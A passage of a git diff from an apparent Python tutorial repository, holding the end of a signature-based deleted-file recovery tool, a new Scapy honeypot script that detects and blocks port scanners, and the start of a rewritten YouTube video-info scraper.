+ 'xlsx': 50 * 1024 * 1024, # 50MB
+ 'pptx': 100 * 1024 * 1024, # 100MB
+ 'mp3': 50 * 1024 * 1024, # 50MB
+ 'mp4': 1024 * 1024 * 1024, # 1GB
+ 'avi': 1024 * 1024 * 1024, # 1GB
+}
+
+class FileRecoveryTool:
+ def __init__(self, source, output_dir, file_types=None, deep_scan=False,
+ block_size=512, log_level=logging.INFO, skip_existing=True,
+ max_scan_size=None, timeout_minutes=None):
+ """
+ Initialize the file recovery tool
+
+ Args:
+ source (str): Path to the source device or directory
+ output_dir (str): Directory to save recovered files
+ file_types (list): List of file types to recover
+ deep_scan (bool): Whether to perform a deep scan
+ block_size (int): Block size for reading data
+ log_level (int): Logging level
+ skip_existing (bool): Skip existing files in output directory
+ max_scan_size (int): Maximum number of bytes to scan
+ timeout_minutes (int): Timeout in minutes
+ """
+ self.source = source
+ self.output_dir = Path(output_dir)
+ self.file_types = file_types if file_types else list(FILE_SIGNATURES.keys())
+ self.deep_scan = deep_scan
+ self.block_size = block_size
+ self.skip_existing = skip_existing
+ self.max_scan_size = max_scan_size
+ self.timeout_minutes = timeout_minutes
+ self.timeout_reached = False
+
+ # Setup logging
+ self.setup_logging(log_level)
+
+ # Create output directory if it doesn't exist
+ self.output_dir.mkdir(parents=True, exist_ok=True)
+
+ # Statistics
+ self.stats = {
+ 'total_files_recovered': 0,
+ 'recovered_by_type': {},
+ 'start_time': time.time(),
+ 'bytes_scanned': 0,
+ 'false_positives': 0
+ }
+
+ for file_type in self.file_types:
+ self.stats['recovered_by_type'][file_type] = 0
+
+ def setup_logging(self, log_level):
+ """Set up logging configuration"""
+ logging.basicConfig(
+ level=log_level,
+ format='%(asctime)s - %(levelname)s - %(message)s',
+ handlers=[
+ logging.StreamHandler(),
+ logging.FileHandler(f"recovery_{datetime.now().strftime('%Y%m%d_%H%M%S')}.log")
+ ]
+ )
+ self.logger = logging.getLogger('file_recovery')
+
+ def _setup_timeout(self):
+ """Set up a timeout handler"""
+ if self.timeout_minutes:
+ def timeout_handler(signum, frame):
+ self.logger.warning(f"Timeout of {self.timeout_minutes} minutes reached!")
+ self.timeout_reached = True
+
+ # Set the timeout (SIGALRM is POSIX-only; not available on Windows)
+ signal.signal(signal.SIGALRM, timeout_handler)
+ signal.alarm(int(self.timeout_minutes * 60))
+
+ def get_device_size(self):
+ """Get the size of the device or file"""
+ if os.path.isfile(self.source):
+ # Regular file
+ return os.path.getsize(self.source)
+ else:
+ # Block device
+ try:
+ # Try using blockdev command (Linux)
+ result = subprocess.run(['blockdev', '--getsize64', self.source],
+ capture_output=True, text=True, check=True)
+ return int(result.stdout.strip())
+ except (subprocess.SubprocessError, FileNotFoundError):
+ try:
+ # Try using ioctl (requires root)
+ import fcntl
+ with open(self.source, 'rb') as fd:
+ # BLKGETSIZE64 = 0x80081272
+ buf = bytearray(8)
+ fcntl.ioctl(fd, 0x80081272, buf)
+ return struct.unpack('Q', buf)[0] # 'Q' = 8-byte unsigned; BLKGETSIZE64 returns a u64
+ except (OSError, ImportError):
+ # Last resort: try to seek to the end
+ try:
+ with open(self.source, 'rb') as fd:
+ fd.seek(0, 2) # Seek to end
+ return fd.tell()
+ except OSError:
+ self.logger.warning("Could not determine device size. Using fallback size.")
+ # Fallback to a reasonable size for testing
+ return 1024 * 1024 * 1024 # 1GB
+
+ def scan_device(self):
+ """Scan the device for deleted files"""
+ self.logger.info(f"Starting scan of {self.source}")
+ self.logger.info(f"Looking for file types: {', '.join(self.file_types)}")
+
+ try:
+ # Get device size
+ device_size = self.get_device_size()
+ self.logger.info(f"Device size: {self._format_size(device_size)}")
+
+ # Set up timeout if specified
+ if self.timeout_minutes:
+ self._setup_timeout()
+ self.logger.info(f"Timeout set for {self.timeout_minutes} minutes")
+
+ with open(self.source, 'rb', buffering=0) as device: # buffering=0 for direct I/O
+ self._scan_device_data(device, device_size)
+
+ except (IOError, OSError) as e:
+ self.logger.error(f"Error accessing source: {e}")
+ return False
+
+ self._print_summary()
+ return True
+
+ def _scan_device_data(self, device, device_size):
+ """Scan the device data for file signatures"""
+ position = 0
+
+ # Limit scan size if specified
+ if self.max_scan_size and self.max_scan_size < device_size:
+ self.logger.info(f"Limiting scan to first {self._format_size(self.max_scan_size)} of device")
+ device_size = self.max_scan_size
+
+ # Create subdirectories for each file type
+ for file_type in self.file_types:
+ (self.output_dir / file_type).mkdir(exist_ok=True)
+
+ scan_start_time = time.time()
+ last_progress_time = scan_start_time
+
+ # Read the device in blocks
+ while position < device_size:
+ # Check if timeout reached
+ if self.timeout_reached:
+ self.logger.warning("Stopping scan due to timeout")
+ break
+
+ try:
+ # Seek to position first
+ device.seek(position)
+
+ # Read a block of data
+ data = device.read(self.block_size)
+ if not data:
+ break
+
+ self.stats['bytes_scanned'] += len(data)
+
+ # Check for file signatures in this block
+ for file_type in self.file_types:
+ signatures = FILE_SIGNATURES.get(file_type, [])
+
+ for signature in signatures:
+ sig_pos = data.find(signature)
+
+ if sig_pos != -1:
+ # Found a file signature, try to recover the file
+ absolute_pos = position + sig_pos
+ device.seek(absolute_pos)
+
+ self.logger.debug(f"Found {file_type} signature at position {absolute_pos}")
+
+ # Recover the file
+ if self._recover_file(device, file_type, absolute_pos):
+ self.stats['total_files_recovered'] += 1
+ self.stats['recovered_by_type'][file_type] += 1
+ else:
+ self.stats['false_positives'] += 1
+
+ # Reset position to continue scanning
+ device.seek(position + self.block_size)
+
+ # Update position and show progress
+ position += self.block_size
+ current_time = time.time()
+
+ # Show progress every 5MB or 10 seconds, whichever comes first
+ if (position % (5 * 1024 * 1024) == 0) or (current_time - last_progress_time >= 10):
+ percent = (position / device_size) * 100 if device_size > 0 else 0
+ elapsed = current_time - self.stats['start_time']
+
+ # Calculate estimated time remaining
+ if position > 0 and device_size > 0:
+ bytes_per_second = position / elapsed if elapsed > 0 else 0
+ remaining_bytes = device_size - position
+ eta_seconds = remaining_bytes / bytes_per_second if bytes_per_second > 0 else 0
+ eta_str = str(timedelta(seconds=int(eta_seconds)))
+ else:
+ eta_str = "unknown"
+
+ self.logger.info(f"Progress: {percent:.2f}% ({self._format_size(position)} / {self._format_size(device_size)}) - "
+ f"{self.stats['total_files_recovered']} files recovered - "
+ f"Elapsed: {timedelta(seconds=int(elapsed))} - ETA: {eta_str}")
+ last_progress_time = current_time
+
+ except Exception as e:
+ self.logger.error(f"Error reading at position {position}: {e}")
+ position += self.block_size # Skip this block and continue
+
+ def _validate_file_content(self, data, file_type):
+ """
+ Additional validation to reduce false positives
+
+ Args:
+ data: File data to validate
+ file_type: Type of file to validate
+
+ Returns:
+ bool: True if file content appears valid
+ """
+ # Check minimum size
+ if len(data) < 100:
+ return False
+
+ # Check for validation patterns
+ patterns = VALIDATION_PATTERNS.get(file_type, [])
+ if patterns:
+ for pattern in patterns:
+ if pattern in data:
+ return True
+ return False # None of the patterns were found
+
+ # For file types without specific validation patterns
+ return True
+
+ def _recover_file(self, device, file_type, start_position):
+ """
+ Recover a file of the given type starting at the given position
+
+ Args:
+ device: Open file handle to the device
+ file_type: Type of file to recover
+ start_position: Starting position of the file
+
+ Returns:
+ bool: True if file was recovered successfully
+ """
+ max_size = MAX_FILE_SIZES.get(file_type, 10 * 1024 * 1024) # Default to 10MB
+ trailer = FILE_TRAILERS.get(file_type)
+
+ # Generate a unique filename
+ filename = f"{file_type}_{start_position}_{int(time.time())}_{binascii.hexlify(os.urandom(4)).decode()}.{file_type}"
+ output_path = self.output_dir / file_type / filename
+
+ if self.skip_existing and output_path.exists():
+ self.logger.debug(f"Skipping existing file: {output_path}")
+ return False
+
+ # Save the current position to restore later
+ current_pos = device.tell()
+
+ try:
+ # Seek to the start of the file
+ device.seek(start_position)
+
+ # Read the file data
+ if trailer and self.deep_scan:
+ # If we know the trailer and deep scan is enabled, read until trailer
+ file_data = self._read_until_trailer(device, trailer, max_size)
+ else:
+ # Otherwise, use heuristics to determine file size
+ file_data = self._read_file_heuristic(device, file_type, max_size)
+
+ if not file_data or len(file_data) < 100: # Ignore very small files
+ return False
+
+ # Additional validation to reduce false positives
+ if not self._validate_file_content(file_data, file_type):
+ self.logger.debug(f"Skipping invalid {file_type} file at position {start_position}")
+ return False
+
+ # Write the recovered file
+ with open(output_path, 'wb') as f:
+ f.write(file_data)
+
+ self.logger.info(f"Recovered {file_type} file: {filename} ({self._format_size(len(file_data))})")
+ return True
+
+ except Exception as e:
+ self.logger.error(f"Error recovering file at position {start_position}: {e}")
+ return False
+ finally:
+ # Restore the original position
+ try:
+ device.seek(current_pos)
+ except OSError:
+ pass # Ignore seek errors in finally block
+
+ def _read_until_trailer(self, device, trailer, max_size):
+ """Read data until a trailer signature is found or max size is reached"""
+ buffer = bytearray()
+ chunk_size = 4096
+
+ while len(buffer) < max_size:
+ try:
+ chunk = device.read(chunk_size)
+ if not chunk:
+ break
+
+ buffer.extend(chunk)
+
+ # Check if trailer is in the buffer
+ trailer_pos = buffer.find(trailer, max(0, len(buffer) - len(trailer) - chunk_size))
+ if trailer_pos != -1:
+ # Found trailer, return data up to and including the trailer
+ return buffer[:trailer_pos + len(trailer)]
+ except Exception as e:
+ self.logger.error(f"Error reading chunk: {e}")
+ break
+
+ # If we reached max size without finding a trailer, return what we have
+ return buffer if len(buffer) > 100 else None
+
+ def _read_file_heuristic(self, device, file_type, max_size):
+ """
+ Use heuristics to determine file size when trailer is unknown
+ This is a simplified approach - real tools use more sophisticated methods
+ """
+ buffer = bytearray()
+ chunk_size = 4096
+ valid_chunks = 0
+ invalid_chunks = 0
+
+ # For Office documents and ZIP files, read a larger initial chunk to validate
+ initial_chunk_size = 16384 if file_type in ['docx', 'xlsx', 'pptx', 'zip'] else chunk_size
+
+ # Read initial chunk for validation
+ initial_chunk = device.read(initial_chunk_size)
+ if not initial_chunk:
+ return None
+
+ buffer.extend(initial_chunk)
+
+ # For Office documents, check if it contains required elements
+ if file_type in ['docx', 'xlsx', 'pptx', 'zip']:
+ # Basic validation for Office Open XML files
+ if file_type == 'docx' and b'word/' not in initial_chunk:
+ return None
+ if file_type == 'xlsx' and b'xl/' not in initial_chunk:
+ return None
+ if file_type == 'pptx' and b'ppt/' not in initial_chunk:
+ return None
+ if file_type == 'zip' and b'PK\x01\x02' not in initial_chunk:
+ return None
+
+ # Continue reading chunks
+ while len(buffer) < max_size:
+ try:
+ chunk = device.read(chunk_size)
+ if not chunk:
+ break
+
+ buffer.extend(chunk)
+
+ # Simple heuristic: for binary files, check if chunk contains too many non-printable characters
+ # This is a very basic approach and would need to be refined for real-world use
+ if file_type in ['jpg', 'png', 'gif', 'pdf', 'zip', 'docx', 'xlsx', 'pptx', 'mp3', 'mp4', 'avi']:
+ # For binary files, we continue reading until we hit max size or end of device
+ valid_chunks += 1
+
+ # For ZIP-based formats, check for corruption
+ if file_type in ['zip', 'docx', 'xlsx', 'pptx'] and b'PK' not in chunk and valid_chunks > 10:
+ # If we've read several chunks and don't see any more PK signatures, we might be past the file
+ invalid_chunks += 1
+
+ else:
+ # For text files, we could check for text validity
+ printable_ratio = sum(32 <= b <= 126 or b in (9, 10, 13) for b in chunk) / len(chunk)
+ if printable_ratio < 0.7: # If less than 70% printable characters
+ invalid_chunks += 1
+ else:
+ valid_chunks += 1
+
+ # Stop once too many invalid chunks have accumulated
+ if invalid_chunks > 3:
+ return buffer[:len(buffer) - (invalid_chunks * chunk_size)]
+ except Exception as e:
+ self.logger.error(f"Error reading chunk in heuristic: {e}")
+ break
+
+ return buffer
+
+ def _format_size(self, size_bytes):
+ """Format size in bytes to a human-readable string"""
+ for unit in ['B', 'KB', 'MB', 'GB', 'TB']:
+ if size_bytes < 1024 or unit == 'TB':
+ return f"{size_bytes:.2f} {unit}"
+ size_bytes /= 1024
+
+ def _print_summary(self):
+ """Print a summary of the recovery operation"""
+ elapsed = time.time() - self.stats['start_time']
+
+ self.logger.info("=" * 50)
+ self.logger.info("Recovery Summary")
+ self.logger.info("=" * 50)
+ self.logger.info(f"Total files recovered: {self.stats['total_files_recovered']}")
+ self.logger.info(f"False positives detected and skipped: {self.stats['false_positives']}")
+ self.logger.info(f"Total data scanned: {self._format_size(self.stats['bytes_scanned'])}")
+ self.logger.info(f"Time elapsed: {timedelta(seconds=int(elapsed))}")
+ self.logger.info("Files recovered by type:")
+
+ for file_type, count in self.stats['recovered_by_type'].items():
+ if count > 0:
+ self.logger.info(f" - {file_type}: {count}")
+
+ if self.timeout_reached:
+ self.logger.info("Note: Scan was stopped due to timeout")
+
+ self.logger.info("=" * 50)
+
+
+def main():
+ """Main function to parse arguments and run the recovery tool"""
+ parser = argparse.ArgumentParser(description='File Recovery Tool - Recover deleted files from storage devices')
+
+ parser.add_argument('source', help='Source device or directory to recover files from (e.g., /dev/sdb, /media/usb)')
+ parser.add_argument('output', help='Directory to save recovered files')
+
+ parser.add_argument('-t', '--types', nargs='+', choices=FILE_SIGNATURES.keys(), default=None,
+ help='File types to recover (default: all supported types)')
+
+ parser.add_argument('-d', '--deep-scan', action='store_true',
+ help='Perform a deep scan (slower but more thorough)')
+
+ parser.add_argument('-b', '--block-size', type=int, default=512,
+ help='Block size for reading data (default: 512 bytes)')
+
+ parser.add_argument('-v', '--verbose', action='store_true',
+ help='Enable verbose output')
+
+ parser.add_argument('-q', '--quiet', action='store_true',
+ help='Suppress all output except errors')
+
+ parser.add_argument('--no-skip', action='store_true',
+ help='Do not skip existing files in output directory')
+
+ parser.add_argument('--max-size', type=int,
+ help='Maximum size to scan in MB (e.g., 1024 for 1GB)')
+
+ parser.add_argument('--timeout', type=int, default=None,
+ help='Stop scanning after specified minutes')
+
+ args = parser.parse_args()
+
+ # Set logging level based on verbosity
+ if args.quiet:
+ log_level = logging.ERROR
+ elif args.verbose:
+ log_level = logging.DEBUG
+ else:
+ log_level = logging.INFO
+
+ # Convert max size from MB to bytes if specified
+ max_scan_size = args.max_size * 1024 * 1024 if args.max_size else None
+
+ # Create and run the recovery tool
+ recovery_tool = FileRecoveryTool(
+ source=args.source,
+ output_dir=args.output,
+ file_types=args.types,
+ deep_scan=args.deep_scan,
+ block_size=args.block_size,
+ log_level=log_level,
+ skip_existing=not args.no_skip,
+ max_scan_size=max_scan_size,
+ timeout_minutes=args.timeout
+ )
+
+ try:
+ recovery_tool.scan_device()
+ except KeyboardInterrupt:
+ print("\nRecovery process interrupted by user.")
+ recovery_tool._print_summary()
+ sys.exit(1)
+
+
+if __name__ == "__main__":
+ main()
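Taken together, `scan_device`, `_scan_device_data`, and `_recover_file` implement classic signature-based carving: find a known header in the raw bytes, then read until a trailer or a size cap. A minimal in-memory sketch of the same idea (the signature table here is a hypothetical subset of the script's `FILE_SIGNATURES`/`FILE_TRAILERS`, and the "device" is just a bytes buffer):

```python
# Hypothetical subset of the script's FILE_SIGNATURES / FILE_TRAILERS tables
SIGNATURES = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n"}
TRAILERS = {"jpg": b"\xff\xd9"}

def carve(raw: bytes, file_type: str, max_size: int = 1 << 20):
    """Return every candidate blob of file_type found in raw, header through trailer."""
    header = SIGNATURES[file_type]
    trailer = TRAILERS.get(file_type)
    found, pos = [], 0
    while (start := raw.find(header, pos)) != -1:
        end = raw.find(trailer, start + len(header)) if trailer else -1
        if end != -1:
            blob = raw[start:end + len(trailer)]   # header through trailer
        else:
            blob = raw[start:start + max_size]     # no trailer: fall back to size cap
        found.append(blob)
        pos = start + len(header)
    return found

# A fake device image: junk, one tiny "jpg", more junk
image = b"\x00" * 16 + b"\xff\xd8\xff\xe0payload\xff\xd9" + b"\x00" * 16
blobs = carve(image, "jpg")
print(len(blobs))  # 1
```

The real tool adds what this sketch omits: block-wise reads, validation patterns to cut false positives, and heuristics for formats without a fixed trailer.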
diff --git a/scapy/honeypot-defense-system/README.md b/scapy/honeypot-defense-system/README.md
new file mode 100644
index 00000000..82c72f3b
--- /dev/null
+++ b/scapy/honeypot-defense-system/README.md
@@ -0,0 +1,4 @@
+# [Building a Honeypot Defense System with Python and Scapy](https://thepythoncode.com/article/python-scapy-honeypot-port-scan-detection-system)
+Requires Linux or Windows with WSL, Python 3.8+, and Scapy. Install Scapy using `pip install scapy` or refer to the [Scapy installation guide](https://scapy.readthedocs.io/en/latest/installation.html) for detailed instructions.
+
+Read the full article on [ThePythonCode](https://thepythoncode.com/article/python-scapy-honeypot-port-scan-detection-system) for a step-by-step tutorial on building a honeypot defense system using Python and Scapy.
\ No newline at end of file
diff --git a/scapy/honeypot-defense-system/block_port_scan.py b/scapy/honeypot-defense-system/block_port_scan.py
new file mode 100644
index 00000000..43c23e61
--- /dev/null
+++ b/scapy/honeypot-defense-system/block_port_scan.py
@@ -0,0 +1,230 @@
+#!/usr/bin/env python3
+"""
+Honeypot Defense System
+Detects port scanners using decoy ports and blocks malicious IPs
+"""
+
+from scapy.all import *
+from datetime import datetime
+import os
+import sys
+
+# ==================== NETWORK INTERFACE ====================
+conf.iface = "enp0s8" # Specify your network interface
+
+# ==================== CONFIGURATION ====================
+DEFENDER_IP = "192.168.56.101" # Change this to your Ubuntu IP
+
+# Three-tier port system
+PUBLIC_PORTS = [80] # Open to everyone (realistic services)
+HONEYPOT_PORTS = [8080, 8443, 3389, 3306] # Decoy ports to trap attackers
+PROTECTED_PORTS = [443, 53, 22, 5432] # Hidden unless IP is allowed
+
+ALLOWED_IPS = [
+ "192.168.1.100", # Add your Kali IP here
+ "192.168.1.1", # Add other trusted IPs
+]
+MAX_ATTEMPTS = 3  # Block an IP after this many honeypot accesses
+LOG_FILE = "honeypot_logs.txt"
+
+# ==================== GLOBALS ====================
+blocked_ips = []
+attempt_tracker = {} # {IP: attempt_count}
+total_scans = 0
+total_blocks = 0
+
+# ==================== HELPER FUNCTIONS ====================
+
+def log_message(message, color_code=None):
+ """Print and save log messages with timestamps"""
+ timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
+ log_entry = f"[{timestamp}] {message}"
+
+ # Color output for terminal
+ if color_code:
+ print(f"\033[{color_code}m{log_entry}\033[0m")
+ else:
+ print(log_entry)
+
+ # Save to file
+ with open(LOG_FILE, "a") as f:
+ f.write(log_entry + "\n")
+
+
+def is_allowed_ip(ip):
+ """Check if IP is in the allowlist"""
+ return ip in ALLOWED_IPS
+
+
+def track_attempt(ip):
+ """Track honeypot access attempts and return current count"""
+ if ip not in attempt_tracker:
+ attempt_tracker[ip] = 0
+ attempt_tracker[ip] += 1
+ return attempt_tracker[ip]
+
+
+def block_ip(ip):
+ """Add IP to blocklist"""
+ global total_blocks
+ if ip not in blocked_ips:
+ blocked_ips.append(ip)
+ total_blocks += 1
+ log_message(f"[!] IP BLOCKED: {ip}", "91") # Red
+
+
+def create_response(packet, flags):
+ """Create a TCP response packet"""
+ if packet.haslayer(IP):
+ response = (
+ Ether(src=packet[Ether].dst, dst=packet[Ether].src) /
+ IP(src=packet[IP].dst, dst=packet[IP].src) /
+ TCP(
+ sport=packet[TCP].dport,
+ dport=packet[TCP].sport,
+ flags=flags,
+ seq=0,
+ ack=packet[TCP].seq + 1
+ )
+ )
+ else: # IPv6
+ response = (
+ Ether(src=packet[Ether].dst, dst=packet[Ether].src) /
+ IPv6(src=packet[IPv6].dst, dst=packet[IPv6].src) /
+ TCP(
+ sport=packet[TCP].dport,
+ dport=packet[TCP].sport,
+ flags=flags,
+ seq=0,
+ ack=packet[TCP].seq + 1
+ )
+ )
+ return response
+
+
+# ==================== MAIN PACKET HANDLER ====================
+
+def handle_packet(packet):
+ """Process incoming TCP packets with three-tier security"""
+ global total_scans
+
+ # Only process TCP SYN packets (connection attempts)
+ if not packet.haslayer(TCP) or packet[TCP].flags != "S":
+ return
+
+ # Extract source IP and destination port
+ if packet.haslayer(IP):
+ source_ip = packet[IP].src
+ else:
+ source_ip = packet[IPv6].src
+
+ dest_port = packet[TCP].dport
+ total_scans += 1
+
+ # ===== CHECK IF IP IS BLOCKED FIRST =====
+ if source_ip in blocked_ips:
+ # Drop packet silently - no response to show as "filtered" in nmap
+ log_message(f"[-] Blocked IP {source_ip} denied access to port {dest_port}", "90")
+ return # Don't send any response - this makes it appear "filtered"
+
+ # ===== PUBLIC PORTS (open to everyone) =====
+ if dest_port in PUBLIC_PORTS:
+ # Let the real service handle it - no response needed from script
+ log_message(f"[+] Public port {dest_port} accessed by {source_ip}", "94") # Blue
+ return
+
+ # ===== HONEYPOT PORTS (trap for attackers) =====
+ if dest_port in HONEYPOT_PORTS:
+ # Always respond with SYN-ACK to appear "open"
+ response = create_response(packet, "SA")
+ sendp(response, verbose=False)
+
+ # Check if IP is allowed
+ if is_allowed_ip(source_ip):
+ log_message(
+ f"[+] HONEYPOT ACCESS from {source_ip}:{dest_port}\n"
+ f"[!] Status: TRUSTED IP (allowed)",
+ "92" # Green
+ )
+ else:
+ # Track attempts for unknown IPs
+ attempts = track_attempt(source_ip)
+ log_message(
+ f"[!] HONEYPOT ACCESS from {source_ip}:{dest_port}\n"
+ f"[-] Status: UNKNOWN IP - POTENTIAL ATTACKER\n"
+ f"[!] Strike {attempts}/{MAX_ATTEMPTS}",
+ "93" # Yellow
+ )
+
+ # Block after max attempts
+ if attempts >= MAX_ATTEMPTS:
+ block_ip(source_ip)
+ return
+
+ # ===== PROTECTED PORTS (only allowed IPs) =====
+ if dest_port in PROTECTED_PORTS:
+ if is_allowed_ip(source_ip):
+ # Respond with SYN-ACK for allowed IPs
+ response = create_response(packet, "SA")
+ sendp(response, verbose=False)
+ log_message(f"[!] Protected port {dest_port} accessed by TRUSTED IP {source_ip}", "92")
+ else:
+ # Drop packet silently for unknown IPs (appears filtered)
+ log_message(f"[!] Protected port {dest_port} hidden from {source_ip}", "93")
+ return
+
+ # ===== OTHER PORTS (default behavior - drop silently) =====
+ # Unknown ports are silently dropped (appear filtered)
+
+
+# ==================== STARTUP & MAIN ====================
+
+def print_banner():
+ """Display startup information"""
+ print("\n" + "="*60)
+ print("[+] HONEYPOT DEFENSE SYSTEM ACTIVE")
+ print("="*60)
+ print(f"Defending IP: {DEFENDER_IP}")
+ print(f"Public Ports (open to all): {PUBLIC_PORTS}")
+ print(f"Honeypot Ports (trap): {HONEYPOT_PORTS}")
+ print(f"Protected Ports (allowed IPs only): {PROTECTED_PORTS}")
+ print(f"Allowed IPs: {ALLOWED_IPS}")
+ print(f"Block Threshold: {MAX_ATTEMPTS} attempts")
+ print(f"Log File: {LOG_FILE}")
+ print("="*60)
+ print("Monitoring traffic... Press Ctrl+C to stop\n")
+
+
+def print_summary():
+ """Display statistics on exit"""
+ print("\n" + "="*60)
+ print("[+] SESSION SUMMARY")
+ print("="*60)
+ print(f"Total scans detected: {total_scans}")
+ print(f"IPs blocked: {total_blocks}")
+ print(f"Current blocklist: {blocked_ips if blocked_ips else 'None'}")
+ print("="*60 + "\n")
+
+
+def main():
+ """Main execution"""
+ print_banner()
+
+ # Create BPF filter
+ packet_filter = f"dst host {DEFENDER_IP} and tcp"
+
+ try:
+ # Start sniffing
+ sniff(filter=packet_filter, prn=handle_packet, store=False)
+ except KeyboardInterrupt:
+ print("\n\n[!] Stopping honeypot defense...")
+ print_summary()
+ sys.exit(0)
+
+
+if __name__ == "__main__":
+ # Check for root privileges
+ if os.geteuid() != 0:
+ print("[!] This script requires root privileges. Run with: sudo python3 block_port_scan.py")
+ sys.exit(1)
+
+ main()
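The three-tier policy in `handle_packet` can be reasoned about (and tested) without Scapy or root. A dependency-free sketch of the same branching, using the script's example port lists and allowlist:

```python
PUBLIC = {80}                          # open to everyone
HONEYPOT = {8080, 8443, 3389, 3306}    # decoys that always look open
PROTECTED = {443, 53, 22, 5432}        # visible only to allowed IPs
ALLOWED = {"192.168.1.100", "192.168.1.1"}

def classify(src_ip: str, dport: int, blocked: set) -> str:
    """Mirror handle_packet's branching: what does a SYN to dport get back?"""
    if src_ip in blocked:
        return "drop"        # silent drop -> nmap reports "filtered"
    if dport in PUBLIC:
        return "pass"        # the real service answers
    if dport in HONEYPOT:
        return "syn-ack"     # always looks open (the trap)
    if dport in PROTECTED:
        return "syn-ack" if src_ip in ALLOWED else "drop"
    return "drop"            # everything else appears filtered

print(classify("10.9.9.9", 3306, set()))  # an unknown IP probing a decoy port gets "syn-ack"
```

Because honeypot ports answer everyone while protected ports answer only the allowlist, a scanner that lights up the decoys but not the real services has identified itself.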
diff --git a/scapy/honeypot-defense-system/requirements.txt b/scapy/honeypot-defense-system/requirements.txt
new file mode 100644
index 00000000..93b351f4
--- /dev/null
+++ b/scapy/honeypot-defense-system/requirements.txt
@@ -0,0 +1 @@
+scapy
\ No newline at end of file
diff --git a/web-scraping/youtube-extractor/extract_video_info.py b/web-scraping/youtube-extractor/extract_video_info.py
index 042ce4f8..bed184b0 100644
--- a/web-scraping/youtube-extractor/extract_video_info.py
+++ b/web-scraping/youtube-extractor/extract_video_info.py
@@ -1,92 +1,150 @@
-from requests_html import HTMLSession
-from bs4 import BeautifulSoup as bs
+import requests
+from bs4 import BeautifulSoup
import re
import json
-
-# init session
-session = HTMLSession()
-
+import argparse
def get_video_info(url):
- # download HTML code
- response = session.get(url)
- # execute Javascript
- response.html.render(timeout=60)
- # create beautiful soup object to parse HTML
- soup = bs(response.html.html, "html.parser")
- # open("index.html", "w").write(response.html.html)
- # initialize the result
- result = {}
- # video title
- result["title"] = soup.find("meta", itemprop="name")['content']
- # video views
- result["views"] = soup.find("meta", itemprop="interactionCount")['content']
- # video description
- result["description"] = soup.find("meta", itemprop="description")['content']
- # date published
- result["date_published"] = soup.find("meta", itemprop="datePublished")['content']
- # get the duration of the video
- result["duration"] = soup.find("span", {"class": "ytp-time-duration"}).text
- # get the video tags
- result["tags"] = ', '.join([ meta.attrs.get("content") for meta in soup.find_all("meta", {"property": "og:video:tag"}) ])
-
- # Additional video and channel information (with help from: https://stackoverflow.com/a/68262735)
- data = re.search(r"var ytInitialData = ({.*?});", soup.prettify()).group(1)
- data_json = json.loads(data)
- videoPrimaryInfoRenderer = data_json['contents']['twoColumnWatchNextResults']['results']['results']['contents'][0]['videoPrimaryInfoRenderer']
- videoSecondaryInfoRenderer = data_json['contents']['twoColumnWatchNextResults']['results']['results']['contents'][1]['videoSecondaryInfoRenderer']
- # number of likes
- likes_label = videoPrimaryInfoRenderer['videoActions']['menuRenderer']['topLevelButtons'][0]['toggleButtonRenderer']['defaultText']['accessibility']['accessibilityData']['label'] # "No likes" or "###,### likes"
- likes_str = likes_label.split(' ')[0].replace(',','')
- result["likes"] = '0' if likes_str == 'No' else likes_str
- # number of likes (old way) doesn't always work
- # text_yt_formatted_strings = soup.find_all("yt-formatted-string", {"id": "text", "class": "ytd-toggle-button-renderer"})
- # result["likes"] = ''.join([ c for c in text_yt_formatted_strings[0].attrs.get("aria-label") if c.isdigit() ])
- # result["likes"] = 0 if result['likes'] == '' else int(result['likes'])
- # number of dislikes - YouTube does not publish this anymore...
- # result["dislikes"] = ''.join([ c for c in text_yt_formatted_strings[1].attrs.get("aria-label") if c.isdigit() ])
- # result["dislikes"] = '0' if result['dislikes'] == '' else result['dislikes']
- result['dislikes'] = 'UNKNOWN'
- # channel details
- channel_tag = soup.find("meta", itemprop="channelId")['content']
- # channel name
- channel_name = soup.find("span", itemprop="author").next.next['content']
- # channel URL
- # channel_url = soup.find("span", itemprop="author").next['href']
- channel_url = f"https://www.youtube.com/{channel_tag}"
- # number of subscribers as str
- channel_subscribers = videoSecondaryInfoRenderer['owner']['videoOwnerRenderer']['subscriberCountText']['accessibility']['accessibilityData']['label']
- # channel details (old way)
- # channel_tag = soup.find("yt-formatted-string", {"class": "ytd-channel-name"}).find("a")
- # # channel name (old way)
- # channel_name = channel_tag.text
- # # channel URL (old way)
- # channel_url = f"https://www.youtube.com{channel_tag['href']}"
- # number of subscribers as str (old way)
- # channel_subscribers = soup.find("yt-formatted-string", {"id": "owner-sub-count"}).text.strip()
- result['channel'] = {'name': channel_name, 'url': channel_url, 'subscribers': channel_subscribers}
- return result
+ """
+ Extract video information from YouTube using modern approach
+ """
+ headers = {
+ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'
+ }
+
+ try:
+ # Download HTML code
+ response = requests.get(url, headers=headers)
+ response.raise_for_status()
+
+ # Create beautiful soup object to parse HTML
+ soup = BeautifulSoup(response.text, "html.parser")
+
+ # Initialize the result
+ result = {}
+
+ # Extract ytInitialData which contains all the video information
+ data_match = re.search(r'var ytInitialData = ({.*?});', response.text)
+ if not data_match:
+ raise Exception("Could not find ytInitialData in page")
+
+ data_json = json.loads(data_match.group(1))
+
+ # Get the main content sections
+ contents = data_json['contents']['twoColumnWatchNextResults']['results']['results']['contents']
+
+ # Extract video information from videoPrimaryInfoRenderer
+ if 'videoPrimaryInfoRenderer' in contents[0]:
+ primary = contents[0]['videoPrimaryInfoRenderer']
+
+ # Video title
+ result["title"] = primary['title']['runs'][0]['text']
+
+ # Video views
+ result["views"] = primary['viewCount']['videoViewCountRenderer']['viewCount']['simpleText']
+
+ # Date published
+ result["date_published"] = primary['dateText']['simpleText']
+
+ # Extract channel information from videoSecondaryInfoRenderer
+ secondary = None
+ if 'videoSecondaryInfoRenderer' in contents[1]:
+ secondary = contents[1]['videoSecondaryInfoRenderer']
+ owner = secondary['owner']['videoOwnerRenderer']
+
+ # Channel name
+ channel_name = owner['title']['runs'][0]['text']
+
+ # Channel ID
+ channel_id = owner['navigationEndpoint']['browseEndpoint']['browseId']
+
+ # Channel URL - FIXED with proper /channel/ path
+ channel_url = f"https://www.youtube.com/channel/{channel_id}"
+
+ # Number of subscribers
+ channel_subscribers = owner['subscriberCountText']['accessibility']['accessibilityData']['label']
+
+ result['channel'] = {
